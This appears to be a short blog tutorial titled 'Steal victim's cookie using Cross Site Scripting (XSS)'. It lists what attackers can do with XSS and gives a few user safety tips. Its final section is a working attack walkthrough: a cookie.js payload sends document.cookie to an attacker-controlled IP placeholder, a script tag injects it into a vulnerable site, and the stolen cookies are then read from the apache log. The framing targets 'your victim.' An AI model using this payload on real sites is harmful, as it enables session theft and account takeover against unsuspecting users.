Steal victim’s cookie using Cross Site Scripting (XSS)

XSScross-site scripting is a vulnerability that allows an attacker to insert malicious code (JavaScript) into a website script. Once a script has been found to be vulnerable the attacker can e-mail or post a link to that website script to attack a user’s computer.

What can a hacker do with cross-site scripting?

  • Execute JavaScript code.
  • Access cookies stored on a computer to gain access to the victims account.
  • Create fake login pages that steal login details.
  • Access webcams and microphones connected to a computer.
  • Bypass website security designed to protect you and your computer.
  • Create a script that loops or causes other problems that cause the browser to crash.
  • Help other computers perform a DDoS attack on another server.
  • Give the appearance of the site being defaced.
  • Help distribute spam, transfer money, or perform other actions on a user’s account.

How users can reduce being a victim to cross-site scripting

  • Always be cautious with links sent by e-mail and posted on social networks.
  • Never click on a link reporting to be from any financial service or other sensitive site. If your bank, credit card, or related service is wanting you to click on a link open your browser and enter the web address in the address bar.
  • Familiarize yourself with phishing tactics.
  • When done with your online account log out.
  • Keep your browser up-to-date with the latest version.

Steal victim’s cookie using Cross Site Scripting (XSS)

  1. Create cookie.js filevar img = document.createElement (“img”);
    img.src = “http://youipaddress/ddos?” + escape(document.cookie);
    document.body.appendChild(img);
  2. Put cookie.js to your websever
  3. Inset script tag into a vulnerable website.
    <script src=”http://youripaddress/cookie.js”></script>
  4. If your victim visits link that you sent, you will get your victim cookie. You can view apache log at sudo leafpad /var/log/apache2/access.log directory

Demo